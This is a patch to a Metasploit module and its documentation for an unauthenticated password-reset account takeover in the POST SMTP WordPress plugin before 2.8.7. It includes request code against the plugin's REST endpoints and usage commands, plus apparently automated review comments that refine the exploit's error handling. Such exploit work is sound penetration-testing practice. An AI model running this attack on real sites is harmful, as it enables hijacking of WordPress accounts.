From 1906646e67789072a27c1b8ee046883a35a1abfe Mon Sep 17 00:00:00 2001
From: h00die
Date: Thu, 28 Nov 2024 13:18:47 -0500
Subject: [PATCH] peer review

---
 .../admin/http/wp_post_smtp_acct_takeover.md | 18 +++++++++---------
 .../admin/http/wp_post_smtp_acct_takeover.rb | 12 ++++--------
 2 files changed, 13 insertions(+), 17 deletions(-)

diff --git a/documentation/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.md b/documentation/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.md
index dc1a3ce4e821..3ba1a4f01d8c 100644
--- a/documentation/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.md
+++ b/documentation/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.md
@@ -1,10 +1,9 @@
 ## Vulnerable Application
 
-The POST SMTP WordPress plugin
-prior to 2.8.7 is affected by a privilege escalation where an unauthenticated
-user is able to reset the password of an arbitrary user. This is done by
-requesting a password reset, then viewing the latest email logs to find
-the associated password reset email.
+The POST SMTP WordPress plugin prior to 2.8.7 is affected by a privilege
+escalation where an unauthenticated user is able to reset the password
+of an arbitrary user. This is done by requesting a password reset, then
+viewing the latest email logs to find the associated password reset email.
 
 ### Install
 
@@ -51,6 +50,7 @@ volumes:
 7. Enable the post-smtp plugin, select "default" for the SMTP service
    1. Complete the setup using random information, it isn't validated.
 8. Update permalink structure per https://github.com/rapid7/metasploit-framework/pull/18164#issuecomment-1623744244
+   1. Settings -> Permalinks -> Permalink structure -> Select "Post name" -> Save Changes.
 
 ## Verification Steps
 
@@ -60,10 +60,10 @@ volumes:
 3. Do: `use auxiliary/admin/http/wp_post_smtp_acct_takeover`
 4. Do: `set rhost 127.0.0.1`
 5. Do: `set rport 5555`
-6. `set ssl false`
-7. `set username `
-8. `set verbose true`
-9. `run`
+6. Do: `set ssl false`
+7. Do: `set username `
+8. Do: `set verbose true`
+9. Do: `run`
 10. Visit the output URL to reset the user's password.
 
 ## Options
diff --git a/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb b/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb
index e96e6f31cfaa..ddf3e61a63bc 100644
--- a/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb
+++ b/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb
@@ -13,11 +13,10 @@ def initialize(info = {})
         info,
         'Name' => 'Wordpress POST SMTP Account Takeover',
         'Description' => %q{
-          The POST SMTP WordPress plugin
-          prior to 2.8.7 is affected by a privilege escalation where an unauthenticated
-          user is able to reset the password of an arbitrary user. This is done by
-          requesting a password reset, then viewing the latest email logs to find
-          the associated password reset email.
+          The POST SMTP WordPress plugin prior to 2.8.7 is affected by a privilege
+          escalation where an unauthenticated user is able to reset the password
+          of an arbitrary user. This is done by requesting a password reset, then
+          viewing the latest email logs to find the associated password reset email.
         },
         'Author' => [
           'h00die', # msf module
@@ -51,7 +50,6 @@ def register_token
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'wp-json', 'post-smtp', 'v1', 'connect-app'),
-      'ctype' => 'application/x-www-form-urlencoded',
       'headers' => { 'fcm-token' => token, 'device' => device }
     )
     fail_with(Failure::Unreachable, 'Connection failed') unless res
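Review bot: The connect-app POST in register_token is guarded only by `fail_with(Failure::Unreachable, 'Connection failed') unless res`, which covers a missing response but not a refused registration: on a plugin at or above 2.8.7 the endpoint would presumably answer with a non-nil error reply, and the method would then carry on with a token the target never accepted. Unless the lines below the hunk already check it, add `fail_with(Failure::NotVulnerable, 'Token registration was rejected') unless res.code == 200` directly after the nil check, so a patched target is reported as not vulnerable rather than as unreachable. Dropping the `ctype` on a body-less POST looks fine. register_token's body continues past the end of the hunk, so I cannot see whether the status is checked there.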
@@ -82,7 +80,6 @@ def run
     print_status('Requesting logs')
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'wp-json', 'post-smtp', 'v1', 'get-logs'),
-      'ctype' => 'application/x-www-form-urlencoded',
       'headers' => { 'fcm-token' => token, 'device' => device }
     )
     fail_with(Failure::Unreachable, 'Connection failed') unless res
@@ -93,7 +90,6 @@ def run
     print_status("Requesting email content from logs for ID #{doc_id}")
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin.php'),
-      'ctype' => 'application/x-www-form-urlencoded',
       'headers' => { 'fcm-token' => token, 'device' => device },
       'vars_get' => { 'access_token' => token, 'type' => 'log', 'log_id' => doc_id }
     )
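Review bot: The get-logs request at the top of this hunk uses the attacker-registered `fcm-token` as its only credential, yet its sole failure path is `fail_with(Failure::Unreachable, 'Connection failed') unless res`, which does not distinguish a dead host from an HTTP-level rejection of that token or an empty log listing. If the lines after the hunk do not already do so, add `fail_with(Failure::UnexpectedReply, 'Unexpected reply requesting logs') unless res.code == 200` before the listing is parsed, and keep `Failure::Unreachable` for the nil case only; the same applies to the admin.php request in the following hunk, where a rejected `access_token` would otherwise be reported as a connection failure. Removing the form-urlencoded `ctype` from these body-less GETs is correct. `run`'s body starts before and continues after the hunks shown here.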